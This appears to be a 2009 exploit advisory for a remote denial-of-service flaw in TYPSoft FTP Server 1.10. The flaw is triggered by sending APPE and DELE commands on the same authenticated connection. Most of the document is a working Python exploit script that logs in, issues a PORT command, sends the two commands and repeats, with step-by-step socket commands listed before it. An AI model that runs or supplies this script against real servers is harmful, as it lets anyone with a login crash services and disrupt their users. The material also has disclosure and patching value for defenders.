TYPSoft FTP server remote denial of service exploit that makes use of APPE and DELE.
150ed27b3194fd15afb4196da0b3242fafea00c033ef3d9bc7a6952922cdb67d
Date of Discovery: 24-Nov-2009
Credits:leinakesi[at]gmail.com
Vendor: TYPSoft
Affected:
TYPSoft FTP Server Version 1.10
Earlier versions may also be affected
Overview:
TYPSoft FTP Server is an easy use FTP server Application. Denial of Service vulnerability exists in TYPSoft FTP Server when
"APPE" and "DELE" commands are used in the same socket connection.
Details:
If you could log on the server successfully, take the following steps and the ftp server will crash which would lead to
Denial of Service attack:
1.sock.connect((hostname, 21))
2.sock.send("user %s\r\n" %username)
3.sock.send("pass %s\r\n" %passwd)
4.sock.send("PORT 127,0,0,1,122,107\r\n")
5.sock.send("APPE "+ test_string +"\r\n")
6.sock.send("DELE "+ test_string +"\r\n")
7.sock.close()
Severity:
High
Exploit example:
#!/usr/bin/python
import socket
import sys
import time
def Usage():
print ("Usage: ./expl.py <local_ip> <serv_ip> <Username> <password>\n")
print ("Example:./expl.py 127.0.0.1 127.0.0.1 anonymous anonymous\n")
print ("Example:./expl.py 192.168.48.183 192.168.48.111 anonymous anonymous\n")
if len(sys.argv) <> 5:
Usage()
sys.exit(1)
else:
local=sys.argv[1]
hostname=sys.argv[2]
username=sys.argv[3]
passwd=sys.argv[4]
test_string="a"*30
ip_every=local.split('.')
for i in range(1,10000):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock_data = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((hostname, 21))
except:
print ("Connection error!")
sys.exit(1)
r=sock.recv(1024)
print "[+] "+ r
sock.send("user %s\r\n" %username)
print "[-] "+ ("user %s\r\n" %username)
r=sock.recv(1024)
print "[+] "+ r
sock.send("pass %s\r\n" %passwd)
print "[-] "+ ("pass %s\r\n" %passwd)
r=sock.recv(1024)
print "[+] "+ r
sock_data.bind((local,31339))
sock_data.listen(1)
sock.send("PORT " + ip_every[0] +","+ ip_every[1] +","+ ip_every[2] +"," + ip_every[3] + ",122,107\r\n")
print "[-] "+ ("PORT " + local + "122,107\r\n")
r=sock.recv(1024)
print "[+] "+ r
sock.send("APPE "+ test_string +"\r\n")
print "[-] "+ ("APPE "+ test_string +"\r\n")
r=sock.recv(1024)
print "[+] "+ r
sock.send("DELE "+ test_string +"\r\n")
print "[-] "+ ("DELE "+ test_string +"\r\n")
r=sock.recv(1024)
print "[+] "+ r
sock.close()
sock_data.close()
time.sleep(2)
sys.exit(0);